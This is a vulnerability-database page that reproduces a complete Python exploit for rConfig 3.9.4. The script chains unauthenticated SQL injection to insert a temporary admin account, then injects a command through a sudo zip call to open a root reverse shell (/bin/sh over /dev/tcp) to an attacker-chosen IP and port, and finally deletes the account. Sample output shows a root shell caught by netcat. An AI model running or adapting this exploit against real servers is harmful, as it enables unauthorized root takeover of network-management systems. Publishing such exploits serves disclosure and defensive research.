Vulners
Lucene search
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
 | rConfig 3.9.3 - Authenticated Remote Code Execution Exploit | 30 Jan 202000:00 | – | zdt |
| rConfig 3.9 - (searchColumn) SQL Injection Exploit | 12 Mar 202000:00 | – | zdt |
| Rconfig 3.x Chained Remote Code Execution Exploit | 17 Mar 202000:00 | – | zdt |
| rConfig 3.9.4 - (searchField) Unauthenticated Root Remote Code Execution Exploit | 28 Mar 202000:00 | – | zdt |
 | Exploit for OS Command Injection in Rconfig | 2 Dec 201916:32 | – | githubexploit |
 | CVE-2020-10547 | 4 Jun 202000:00 | – | attackerkb |
| CVE-2019-19585 | 8 Aug 201900:00 | – | attackerkb |
| CVE-2020-10548 | 4 Jun 202000:00 | – | attackerkb |
| CVE-2020-10549 | 4 Jun 202000:00 | – | attackerkb |
| CVE-2020-10546 | 4 Jun 202000:00 | – | attackerkb |
10
# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
# Exploit Author: vikingfr
# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)
# Date: 2020-03-12
# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Version: tested v3.9.4
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Example :
# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334
# rConfig - 3.9 - Unauthenticated root RCE
# [+] Adding a temporary admin user...
# [+] Authenticating as dywzxuvbah...
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# [+] The reverse shell seems to be opened :-)
# [+] Removing the temporary admin user...
# [+] Done.
#
# $ nc -nvlp 3334
# listening on [any] 3334 ...
# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186
# sh: no job control in this shell
# sh-4.2# id
# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2#
#!/usr/bin/python3
import requests
import sys
import urllib.parse
import string
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from requests.exceptions import Timeout
print ("rConfig - 3.9 - Unauthenticated root RCE")
if len(sys.argv) != 4:
print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")
exit()
target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
def generateUsername(stringLength=8):
u= string.ascii_lowercase
return ''.join(random.sample(u,stringLength))
print ("[+] Adding a temporary admin user...")
fake_id = str(random.randint(200,900))
fake_user = generateUsername(10)
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
userleveladmin = 9 # Administrator
addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
encoded_request = target+vuln_page+vuln_parameters+addUserPayload
firstrequest = requests.session()
exploit_req = firstrequest.get(encoded_request,verify=False)
request = requests.session()
login_info = {
"user": fake_user,
"pass": "admin",
"sublogin": 1
}
print ("[+] Authenticating as "+fake_user+"...")
login_request = request.post(
target+"/lib/crud/userprocess.php",
login_info,
verify=False,
allow_redirects=True
)
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)
payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)
if dashboard_request.status_code == 200:
print ("[+] Logged in successfully, triggering the payload...")
encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
print ("[+] Check your listener !")
try:
exploit_req = request.get(encoded_request,timeout=10)
except Timeout:
print('[+] The reverse shell seems to be opened :-)')
else:
print('[-] The command was not executed by the target or you forgot to open a listener...')
elif dashboard_request.status_code == 302:
print ("[-] Wrong credentials !? Maybe admin were not added...")
exit()
print("[+] Removing the temporary admin user...")
delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"
encoded_request = target+vuln_page+vuln_parameters+delUserPayload
lastrequest = requests.session()
exploit_req = lastrequest.get(encoded_request,verify=False)
print ("[+] Done.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2020 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.19.8
CVSS 29
EPSS0.94261